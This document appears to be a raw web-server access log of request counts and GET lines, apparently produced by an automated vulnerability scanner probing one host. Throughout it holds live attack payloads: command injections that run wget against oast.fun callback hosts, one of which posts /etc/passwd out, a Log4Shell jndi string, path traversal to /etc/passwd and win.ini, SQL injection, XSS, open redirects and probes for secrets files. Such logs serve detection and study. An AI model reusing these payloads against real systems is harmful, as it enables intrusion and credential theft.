1 GET /.json?FNZ.ico HTTP/1.1
1 GET /.json HTTP/1.1
1 GET /.ksh_history HTTP/1.1
1 GET /.licenserc.yaml HTTP/1.1
1 GET /.msmtprc HTTP/1.1
1 GET /.phpspec.yml HTTP/1.1
1 GET /.phpunit.result.cache HTTP/1.1
1 GET /.pre-commit-config.yaml HTTP/1.1
1 GET /.remote-sync.json HTTP/1.1
1 GET /.sass-lint.yml HTTP/1.1
1 GET /.sh_history HTTP/1.1
1 GET /.zsh_history HTTP/1.1
1 GET ///apps HTTP/1.1
1 GET ///etc....4.2.1....json HTTP/1.1
1 GET ///etc[.]1[.]json HTTP/1.1
1 GET ///etc[.]children....4.2.1....json HTTP/1.1
1 GET ///etc[.]children[.]1[.]json HTTP/1.1
1 GET ///etc[.]children[.]json/FNZ.css HTTP/1.1
1 GET ///etc[.]children[.]json/FNZ.html HTTP/1.1
1 GET ///etc[.]children[.]json/FNZ.ico HTTP/1.1
1 GET ///etc[.]children[.]json/FNZ.png HTTP/1.1
1 GET ///etc[.]children[.]json?FNZ.css HTTP/1.1
1 GET ///etc[.]children[.]json?FNZ.html HTTP/1.1
1 GET ///etc[.]children[.]json?FNZ.ico HTTP/1.1
1 GET ///etc[.]children[.]json HTTP/1.1
1 GET ///etc[.]json/FNZ.html HTTP/1.1
1 GET ///etc[.]json/FNZ.ico HTTP/1.1
1 GET ///etc[.]json/FNZ.png HTTP/1.1
1 GET ///etc[.]json?FNZ.css HTTP/1.1
1 GET ///etc[.]json?FNZ.ico HTTP/1.1
1 GET ///etc[.]json HTTP/1.1
1 GET ///etc HTTP/1.1
1 GET ///home HTTP/1.1
1 GET ///var HTTP/1.1
1 GET //WEB-INF/web.xml HTTP/1.1
1 GET //WEB-INF/weblogic.xml HTTP/1.1
1 GET /2Lw00PSmAE0c3wRgIZqSFYSy14J/..;/host-manager/html HTTP/1.1
1 GET /2Lw00PSmAE0c3wRgIZqSFYSy14J/..;/manager/html HTTP/1.1
1 GET /2Lw00PSvlB2B9ljRqdldrTIUQDP.txt HTTP/1.1
1 GET /2Lw02pospG9iHc91ivzcIdTiaXi.php?cmd=sudo%20rpm%20--eval%20'%25%7Blua:os.execute(%22wget%20http[:]//cfoshuv52mup8baf1ho0a5byt9qke6tye[.]oast[.]fun%22)%7D' HTTP/1.1
1 GET /404 HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?action=command&command=set_city_timezone&value=$(wget%20http[:]//cfoshuv52mup8baf1ho01dxk87wrj9gef[.]oast[.]fun)) HTTP/1.1
1 GET /?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= HTTP/1.1
2 GET /?author=1 HTTP/1.1
1 GET /?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /?lang=../../../../../vendor/topthink/think-trace/src/TraceDebug HTTP/1.1
1 GET /?lang=../../thinkphp/base HTTP/1.1
1 GET /?mdocs-img-preview=../../../wp-config.php HTTP/1.1
1 GET /?patreon_action=serve_patron_only_image&patron_only_image=../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /?paytm_action=curltest&url=cfoshuv52mup8baf1ho0qhoz7nh8k3rf3.oast.fun HTTP/1.1
1 GET /?post_type=post&s=%22%3E%3Cscript%3Ealert(/2Lw00LYXzNmcesRfoebYZNHqEPQ/)%3C/script%3E+ HTTP/1.1
1 GET /?pp=env HTTP/1.1
1 GET /?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1 HTTP/1.1
1 GET /?redirect=https[:]//interact[.]sh/&wptouch_switch=desktop HTTP/1.1
1 GET /?{alert(document.domain)} HTTP/1.1
1 GET /Account/login HTTP/1.1
1 GET /Admin/Access/Setup/Default.aspx?Action=createadministrator&adminemail=test@test.com&adminname=test&adminpassword=h3cAPs&adminusername=HW2Reu HTTP/1.1
1 GET /Admin/ServerSide/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1
1 GET /Admin HTTP/1.1
1 GET /App_Master/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1
1 GET /AsiCommon/Controls/ContentManagement/ContentDesigner/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1
1 GET /Audio/1/hls/..%255C..%255C..%255C..%255C..%255C..%255CWindows%255Cwin.ini/stream.mp3/ HTTP/1.1
1 GET /AvalancheWeb/image?imageFilePath=C:/windows/win.ini HTTP/1.1
1 GET /CACHE/sdesktop/install/start.htm HTTP/1.1
1 GET /CFIDE/componentutils/login.cfm HTTP/1.1
1 GET /CFIDE/scripts/ajax/package/cfajax.js HTTP/1.1
1 GET /CF_SFSD/scripts/ajax/package/cfajax.js HTTP/1.1
1 GET /CMSInstall/install.aspx HTTP/1.1
1 GET /CMSPages/GetDocLink.ashx?link=https[:]//interact[.]sh/ HTTP/1.1
1 GET /CMSPages/logon.aspx HTTP/1.1
1 GET /Cargo.lock HTTP/1.1
1 GET /DesktopModule/UIQuestionControls/UIAskQuestion/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1
1 GET /DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx?dp=1 HTTP/1.1
1 GET /DesktopModules/TNComments/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1
1 GET /EMSWebClient/Login.aspx HTTP/1.1
1 GET /Forms/rpAuth_1?id=</form><iMg%20src=x%20onerror=\"prompt(document.domain)\"><form> HTTP/1.1
1 GET /Gruntfile.coffee HTTP/1.1
1 GET /Gruntfile.js HTTP/1.1
1 GET /Guardfile HTTP/1.1
1 GET /IND780/excalweb.dll?webpage=../../AutoCE.ini HTTP/1.1
1 GET /InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion[.]Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1
1 GET /JavaScriptServlet HTTP/1.1
1 GET /Login.aspx HTTP/1.1
1 GET /Login.jsp HTTP/1.1
1 GET /Login?!'><sVg/OnLoAD=alert1337// HTTP/1.1
1 GET /Main_Login.asp HTTP/1.1
1 GET /MicroStrategyLibrary/auth/ui/loginPage?loginMode=alert(document.domain) HTTP/1.1
1 GET /Modules/CMS/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1
1 GET /OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName&redirect=%2f%5cinteract.sh HTTP/1.1
1 GET /PMA/server_import.php HTTP/1.1
1 GET /Providers/HtmlEditorProviders/Telerik/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1
1 GET /QH.aspx?action=download&fileName=.%2fQH.aspx&responderId=ResourceNewResponder HTTP/1.1
1 GET /SAAS/t/_/;/WEB-INF/web.xml HTTP/1.1
1 GET /SOGo HTTP/1.1
1 GET /SecurityGateway.dll?9OW4L7RSDY=1&redirect=true&view=login HTTP/1.1
1 GET /SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion[.]Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1
1 GET /Solar_SlideSub.php?bgcolor=green&id=4&play=1&pow=sds%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22 HTTP/1.1
1 GET /Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1
1 GET /Telerik.Web.UI.DialogHandler.axd?dp=1 HTTP/1.1
1 GET /Videos/1/hls/m/..%255C..%255C..%255C..%255C..%255C..%255CWindows%255Cwin.ini/stream.mp3/ HTTP/1.1
1 GET /\\u001B]8;;https[:]//interact[.]sh\"/onmouseover=\"alert(1)\\u0007example\\u001B]8;;\\u0007 HTTP/1.1
1 GET /__r2/query-printRows.view?query.containerFilterName=CurrentAndSubfolders&query.queryName=ListManager&query.selectionKey=%24ListManager%24ListManager%24%24query&query.showRows=ALL&query.sort=Nameelk5q%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ezp59r&schemaName=ListManager HTTP/1.1
1 GET /_debugbar/open?max=20&offset=0 HTTP/1.1
1 GET /_plugin/head/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /_vti_bin/Authentication.asmx?op=Mode HTTP/1.1
1 GET /aa404bb?a</script><script>alert(/XSS/)</script> HTTP/1.1
1 GET /account/signin?ReturnUrl=%2f HTTP/1.1
1 GET /acs/..;/admin/public/login.jsp?error=%3Cscript%3Ealert(document.domain)%3C/script%3e HTTP/1.1
1 GET /actuator/autoconfig HTTP/1.1
1 GET /actuator/heapdump HTTP/1.1
1 GET /actuator/jolokia/exec/ch[.]qos[.]logback[.]classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/random:915!/logback.xml HTTP/1.1
1 GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName HTTP/1.1
1 GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor HTTP/1.1
1 GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion HTTP/1.1
1 GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId HTTP/1.1
1 GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName HTTP/1.1
1 GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor HTTP/1.1
1 GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion HTTP/1.1
1 GET /actuator/jolokia/read/java[.]lang:type=Memory HTTP/1.1
1 GET /actuator/loggers HTTP/1.1
1 GET /actuator/mappings HTTP/1.1
1 GET /actuator/metrics HTTP/1.1
1 GET /actuator/status HTTP/1.1
1 GET /addons/phpmailer/phpmailer.php HTTP/1.1
1 GET /adm/file.cgi?next_file=%2fetc%2fpasswd HTTP/1.1
1 GET /admin.php HTTP/1.1
4 GET /admin/ HTTP/1.1
1 GET /admin/data/autosuggest-remote.php?q=\"><img%20src=x%20onerror=alert(1)> HTTP/1.1
1 GET /admin/histograms?fmt=plot_cdf&h=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&log_scale=true HTTP/1.1
1 GET /admin/index.html HTTP/1.1
2 GET /admin/index.php?page=home HTTP/1.1
1 GET /admin/login HTTP/1.1
1 GET /admin/phpMyAdmin/server_import.php HTTP/1.1
1 GET /admin/pma/server_import.php HTTP/1.1
1 GET /admin/public/login.jsp?error=%3Cscript%3Ealert(document.domain)%3C/script%3e HTTP/1.1
1 GET /admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68 HTTP/1.1
1 GET /admin/server_import.php HTTP/1.1
1 GET /admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4 HTTP/1.1
1 GET /admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2 HTTP/1.1
1 GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /agc/vicidial_mysqli_errors.txt HTTP/1.1
1 GET /android/app/google-services.json HTTP/1.1
1 GET /api/ HTTP/1.1
1 GET /api/geojson?url=${jndi:ldap://${sys:os.name}.cfoshuv52mup8baf1ho09wqom587fr7nc.oast.fun} HTTP/1.1
1 GET /api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20cfoshuv52mup8baf1ho0troi5wturbxtd.oast.fun) HTTP/1.1
1 GET /api/graphql?query={__typename} HTTP/1.1
1 GET /api/proxy/tcp HTTP/1.1
1 GET /api/scrape/kube-system HTTP/1.1
1 GET /api/status HTTP/1.1
1 GET /api/tenants HTTP/1.1
1 GET /api/userrolelist/systemRoles?require-cfg.js HTTP/1.1
1 GET /api/v1/GetDevice HTTP/1.1
1 GET /api/v1/GetSrc HTTP/1.1
1 GET /api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs HTTP/1.1
1 GET /api/v1/targets HTTP/1.1
1 GET /api/whoami HTTP/1.1
1 GET /api/xml HTTP/1.1
1 GET /apimanui/api-manager HTTP/1.1
1 GET /app/google-services.json HTTP/1.1
1 GET /app/kibana HTTP/1.1
1 GET /app/welcome/default/ HTTP/1.1
1 GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1
1 GET /appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Bsubmit%5D=Change%20Password&login%5Buse_curr%5D=1 HTTP/1.1
1 GET /applications.pinpoint HTTP/1.1
1 GET /apps.tidy.infinity.json HTTP/1.1
1 GET /apps HTTP/1.1
1 GET /appsettings.Production.json HTTP/1.1
1 GET /appsettings.json HTTP/1.1
1 GET /asd/../../../../../../../../etc/passwd HTTP/1.1
1 GET /assets/file:%252f%252f/etc/passwd HTTP/1.1
1 GET /assets/npm-debug.log HTTP/1.1
1 GET /assets/php/filebrowser/filebrowser.main.php?do=download&file=../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /assets/pubspec.yaml HTTP/1.1
1 GET /auth/login/page HTTP/1.1
2 GET /auth/login HTTP/1.1
1 GET /auth/logout?continue=//interact[.]sh HTTP/1.1
1 GET /authorization.do HTTP/1.1
1 GET /autoconfig HTTP/1.1
1 GET /axis2-admin/ HTTP/1.1
1 GET /axis2/ HTTP/1.1
1 GET /axis2/axis2-admin/ HTTP/1.1
1 GET /backend/admin/users?username=anonymous HTTP/1.1
1 GET /backend/backend/auth/signin HTTP/1.1
1 GET /badging/badge_template_v0.php?layout=1&type=\"/><svg/onload=\"alert(document.domain)\"/> HTTP/1.1
1 GET /behat.yml.dist HTTP/1.1
1 GET /behat.yml HTTP/1.1
1 GET /bibliopac/bin/wxis.exe/bibliopac/?IsisScript=bibliopac/bin/bibliopac.xic&db=\"><script>prompt(document.domain)</script> HTTP/1.1
1 GET /bitrix/redirect.php?event1&event2&event3&goto=https[:]//interact[.]sh HTTP/1.1
1 GET /bitrix/redirect.php?event1&event2&event3=download&goto=https[:]//interact[.]sh HTTP/1.1
2 GET /bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2&event3=download&goto=https[:]//interact[.]sh HTTP/1.1
1 GET /bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https[:]//interact[.]sh HTTP/1.1
1 GET /bitrix/redirect.php?event1=select_product_t1&event2=contributions&goto=https[:]//interact[.]sh&site_id=s1 HTTP/1.1
1 GET /bitrix/redirect.php?event3=352513&goto=https[:]//interact[.]sh HTTP/1.1
1 GET /bitrix/rk.php?event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https[:]//interact[.]sh&id=691&site_id=s3 HTTP/1.1
1 GET /bitrix/rk.php?event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https[:]//interact[.]sh&id=84&site_id=n1 HTTP/1.1
1 GET /bitrix/rk.php?event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https[:]//interact[.]sh&id=28&site_id=s2 HTTP/1.1
1 GET /bitrix/rk.php?event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https[:]//interact[.]sh&id=129 HTTP/1.1
1 GET /bitrix/rk.php?goto=https[:]//interact[.]sh HTTP/1.1
1 GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0
1 GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0
1 GET /boafrm/formWlanRedirect?redirect-url=http[:]//interact[.]sh&wlan_id=1 HTTP/1.1
1 GET /booking.php?car_id=-1%20union%20select%201,md5(999999999),3,4,5,6,7,8,9,10--+ HTTP/1.1
1 GET /bower.json HTTP/1.1
1 GET /browser/ HTTP/1.1
1 GET /bugs/verify.php?confirm_hash&id=1 HTTP/1.1
1 GET /cacti/ HTTP/1.1
1 GET /calendar/calendar_form.php/%22%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E HTTP/1.1
1 GET /camunda/app/welcome/default/ HTTP/1.1
1 GET /car1/estimateresult/result?s&serviceestimatekey=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
1 GET /carbon/admin/login.jsp HTTP/1.1
1 GET /ccm-web/ HTTP/1.1
1 GET /ccmadmin/bulkvivewfilecontents.do?fileName=../../../../../../../../../../../../../../../../etc/passwd&filetype=samplefile HTTP/1.1
1 GET /cf-scripts/scripts/ajax/package/cfajax.js HTTP/1.1
1 GET /cf_scripts/scripts/ajax/package/cfajax.js HTTP/1.1
1 GET /cfcache.map HTTP/1.1
1 GET /cfide-scripts/ajax/package/cfajax.js HTTP/1.1
1 GET /cfide/componentutils/login.cfm HTTP/1.1
1 GET /cfide/scripts/ajax/package/cfajax.js HTTP/1.1
1 GET /cfmx/CFIDE/scripts/ajax/package/cfajax.js HTTP/1.1
1 GET /cgi-bin/GetSrvInfo.exe HTTP/1.1
1 GET /cgi-bin/admin.cgi?Cmd=ping${IFS}-c${IFS}1${IFS}cfoshuv52mup8baf1ho0wczc9nnjw653z.oast.fun&Command=sysCommand HTTP/1.1
1 GET /cgi-bin/apcupsd/multimon.cgi HTTP/1.1
1 GET /cgi-bin/broker?BG=%23FFFFFF&DATASET=targetdataset&TEMPFILE=Unknown&_DEBUG=131&_DEBUG=131&_ENTRY=SAMPLIB.WEBSAMP.PRINT_TO_HTML.SOURCE&_PROGRAM=sample.webcsf1.sas&_SERVICE=targetservice&_WEBOUT=test&bgtype=COLOR&csftyp=classic,+ssfile1%3d/etc/passwd&style=a+tcolor%3dblue&sysparm=test HTTP/1.1
1 GET /cgi-bin/common/login/webLogin HTTP/1.1
1 GET /cgi-bin/cosmobdf.cgi?function=0 HTTP/1.1
1 GET /cgi-bin/cosmobdf.cgi?function=1 HTTP/1.1
2 GET /cgi-bin/downloadFlile.cgi HTTP/1.1
1 GET /cgi-bin/guestimage.html HTTP/1.1
1 GET /cgi-bin/jarrewrite.sh HTTP/1.1
1 GET /cgi-bin/kerbynet?Action=StartSessionSubmit&PW&User='%0acat%20/etc/passwd%0a' HTTP/1.1
1 GET /cgi-bin/kerbynet?Action=x509List&Section=NoAuthREQ&type=*%22/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd%22 HTTP/1.1
1 GET /cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
1 GET /cgi-bin/loghandler.php?ajax=251&file=/mnt/old-root/etc/passwd HTTP/1.1
1 GET /cgi-bin/luci HTTP/1.1
1 GET /cgi-bin/multimon.cgi HTTP/1.1
1 GET /cgi-bin/qmailadmin/qmailadmin HTTP/1.1
1 GET /cgi-bin/qmailadmin HTTP/1.1
1 GET /cgi-bin/upload/web-ftp.cgi HTTP/1.1
1 GET /cgi-bin/xweb500.cgi HTTP/1.1
1 GET /cgi-ssl/qmailadmin/qmailadmin HTTP/1.1
1 GET /cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%272Lw01ISgStrn59TB2Oq9pPi0u36%27)%3C/script%3E HTTP/1.1
1 GET /cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd HTTP/1.1
1 GET /chpstrt.php?chppath=Home HTTP/1.1
1 GET /client_secrets.json HTTP/1.1
1 GET /cloud/ HTTP/1.1
1 GET /cms/portlets/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1
1 GET /common/admin/Calendar/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1
1 GET /common/admin/Jobs2/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1
1 GET /common/admin/PhotoGallery2/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1
1 GET /common_page/login.html HTTP/1.1
1 GET /components/com_ionfiles/download.php?download=1&file=../../../../../../../../etc/passwd HTTP/1.1
1 GET /composer.json HTTP/1.1
1 GET /composer.lock HTTP/1.1
1 GET /composer/send_email?to=LjWF@Tokp&url=http[:]//cfoshuv52mup8baf1ho0ud1atksrefph3[.]oast[.]fun HTTP/1.1
1 GET /config/secrets.yml HTTP/1.1
1 GET /config/user.xml HTTP/1.1
1 GET /connections HTTP/1.1
1 GET /cors_proxy/https[:]//www[.]interact[.]sh HTTP/1.1
1 GET /cp/Shares?protocol=webaccess&user&v=2.3 HTTP/1.1
1 GET /cpqlogin.htm HTTP/1.1
1 GET /crossdomain.xml HTTP/1.1
1 GET /crx/de/index.jsp HTTP/1.1
1 GET /crx/explorer/browser/index.jsp HTTP/1.1
1 GET /cs/Satellite?WemUI=qqq%27}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FNoXceleditor HTTP/1.1
1 GET /cs/Satellite?WemUI=qqq%27}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FProcessLoginRequest HTTP/1.1
1 GET /cs/Satellite?cs_imagedir=qqq\"><script>alert(document.domain)</script>&pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/complexassetmaker HTTP/1.1
1 GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1
1 GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1
1 GET /css_parser.php?css=css_parser.php HTTP/1.1
1 GET /cxcum/ HTTP/1.1
1 GET /cxwebclient/Login.aspx HTTP/1.1
1 GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1
1 GET /darkstat/ HTTP/1.1
1 GET /dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.aspx/Desktopmodules/Admin/dnnWerk.Users/DialogHandler.aspx?dp=1 HTTP/1.1
1 GET /dashboard/ HTTP/1.1
1 GET /dashboard/snapshot/%257B%257Bconstructor.constructor%28%2527alert%28document.domain%29%2527%29%28%29%257D%257D?orgId=1 HTTP/1.1
1 GET /data/autosuggest-remote.php?q=\"><img%20src=x%20onerror=alert(1)> HTTP/1.1
1 GET /data?get=prodServerGen HTTP/1.1
1 GET /database_credentials.inc HTTP/1.1
1 GET /db/server_import.php HTTP/1.1
1 GET /default.htm HTTP/1.1
1 GET /desktop/container/landing.jsp?locale=en_US HTTP/1.1
1 GET /desktopmodules/dnnwerk.radeditorprovider/dialoghandler.aspx?dp=1 HTTP/1.1
1 GET /desktopmodules/telerikwebui/radeditorprovider/telerik.web.ui.dialoghandler.aspx?dp=1 HTTP/1.1
1 GET /dev/tests/functional/credentials.xml.dist HTTP/1.1
1 GET /dev/tests/functional/etc/config.xml.dist HTTP/1.1
1 GET /development.log HTTP/1.1
1 GET /devices.inc.php?search=True&searchColumn=n.id&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchOption=contains HTTP/1.1
1 GET /dms/admin/accounts/payment_history.php?account_id=2%27 HTTP/1.1
1 GET /docker-cloud.yml HTTP/1.1
1 GET /docs HTTP/1.1
1 GET /documentation/login HTTP/1.1
1 GET /documentation HTTP/1.1
1 GET /dokuwiki/doku.php?at=<svg%20onload=alert(document.domain)>&id=wiki:welcome HTTP/1.1
1 GET /download.php?file=../../../../../etc/passwd HTTP/1.1
1 GET /dumpmdm.cmd HTTP/1.1
1 GET /elFinder/php/connector.minimal.php?cmd=mkfile&name=2Lw00cfdQeJqer4UatCMvyloIve[.]php:aaa&target=l1_Lw HTTP/1.1
1 GET /email_passthrough.php?email_ID=1&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Finteract[.]sh&type=link HTTP/1.1
1 GET /emergency.php HTTP/1.1
1 GET /en/WEB-INF/web.xml;.js HTTP/1.1
1 GET /env.dev.js HTTP/1.1
1 GET /env.development.js HTTP/1.1
1 GET /env.js HTTP/1.1
1 GET /env.prod.js HTTP/1.1
1 GET /env.production.js HTTP/1.1
1 GET /env.test.js HTTP/1.1
1 GET /error.php?SERVER_NAME=<script>alert(document.domain)</script> HTTP/1.1
1 GET /error3?data='alert('nuclei')//&msg=30 HTTP/1.1
1 GET /etc....4.2.1....json HTTP/1.1
1 GET /etc.1.json HTTP/1.1
1 GET /etc.children....4.2.1....json HTTP/1.1
1 GET /etc.children.1.json HTTP/1.1
1 GET /etc.children.json/FNZ.css HTTP/1.1
1 GET /etc.children.json/FNZ.html HTTP/1.1
1 GET /etc.children.json/FNZ.ico HTTP/1.1
1 GET /etc.children.json/FNZ.png HTTP/1.1
1 GET /etc.children.json?FNZ.css HTTP/1.1
1 GET /etc.children.json?FNZ.html HTTP/1.1
1 GET /etc.children.json?FNZ.ico HTTP/1.1
1 GET /etc.children.json HTTP/1.1
1 GET /etc.json/FNZ.css HTTP/1.1
1 GET /etc.json/FNZ.html HTTP/1.1
1 GET /etc.json/FNZ.ico HTTP/1.1
1 GET /etc.json?FNZ.css HTTP/1.1
1 GET /etc.json?FNZ.html HTTP/1.1
1 GET /etc.json?FNZ.ico HTTP/1.1
1 GET /etc.json HTTP/1.1
1 GET /etc/acs-commons/jcr-compare.html HTTP/1.1
1 GET /etc/acs-commons/oak-index-manager.html HTTP/1.1
1 GET /etc/acs-commons/version-compare.html HTTP/1.1
1 GET /etc/acs-commons/workflow-remover.html HTTP/1.1
1 GET /etc/passwd HTTP/1.1
1 GET /etc/reports/diskusage.html?path=/content/dam HTTP/1.1
1 GET /etc/reports/diskusage.html HTTP/1.1
1 GET /etc HTTP/1.1
1 GET /examples/jsp/security/protected/index.jsp HTTP/1.1
1 GET /explore/snippets HTTP/1.1
7 GET /favicon.ico HTTP/1.1
1 GET /fed.rpc.solo.io.GlooInstanceApi/ListClusterDetails HTTP/1.1
1 GET /file=C:%255CWindows%255Cwin.ini HTTP/1.1
1 GET /filemanager/ajax_calls.php?action=get_file&file=../../../../etc/passwd&preview_mode=text&sub_action=preview&title=source HTTP/1.1
1 GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1
1 GET /fpui/jsp/login.jsp HTTP/1.1
1 GET /freepbx/recordings/theme/main.css HTTP/1.1
1 GET /ftpsync.settings HTTP/1.1
1 GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27 HTTP/1.1
1 GET /fw/mindex.do?url=./WEB-INF/web.xml%3f HTTP/1.1
1 GET /gespage/webapp/login.xhtml HTTP/1.1
1 GET /git/notifyCommit?branches=2Lw00Ia9704exYMlHJmQVPxLMDy&url=2Lw00Ia9704exYMlHJmQVPxLMDy HTTP/1.1
1 GET /glpi/status.php HTTP/1.1
1 GET /glpi2/status.php HTTP/1.1
1 GET /go/add-on/business-continuity/api/cruise_config HTTP/1.1
1 GET /go/add-on/business-continuity/api/plugin?folderName&pluginName=../../../etc/passwd HTTP/1.1
1 GET /go/admin/pipelines/create?group=defaultGroup HTTP/1.1
1 GET /goform/activate_process?akey&count=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&hostid&isv HTTP/1.1
1 GET /google-services.json HTTP/1.1
1 GET /graph_realtime.php?action=init HTTP/1.1
1 GET /graphql?query={__typename} HTTP/1.1
1 GET /heapdump HTTP/1.1
1 GET /help/english/index.html?javascript:alert(document.domain) HTTP/1.1
1 GET /home.asp HTTP/1.1
1 GET /home HTTP/1.1
1 GET /horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00 HTTP/1.1
1 GET /hoteldruid/inizio.php HTTP/1.1
1 GET /hoteldruid/visualizza_tabelle.php?anno=2019&cambia1=3134671%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&cerca_id_passati=1&id_sessione&num_cambia_pren=1&subtotale_selezionate=1&tipo_tabella=prenotazioni HTTP/1.1
1 GET /hp/device/this.LCDispatcher HTTP/1.1
1 GET /hp/device/webAccess/index.htm?content=security HTTP/1.1
1 GET /hsqldb%250a HTTP/1.1
1 GET /html/index.html HTTP/1.1
1 GET /html/login.html HTTP/1.1
1 GET /html/repository HTTP/1.1
1 GET /http[:]//13[.]67[.]44[.]234/apisix/admin/migrate/export HTTP/1.1
1 GET /http[:]//13[.]67[.]44[.]234/http:/13.67.44.234/robots.txt HTTP/1.1
1 GET /http[:]//13[.]67[.]44[.]234/robots.txt HTTP/1.1
1 GET /hui/index.html HTTP/1.1
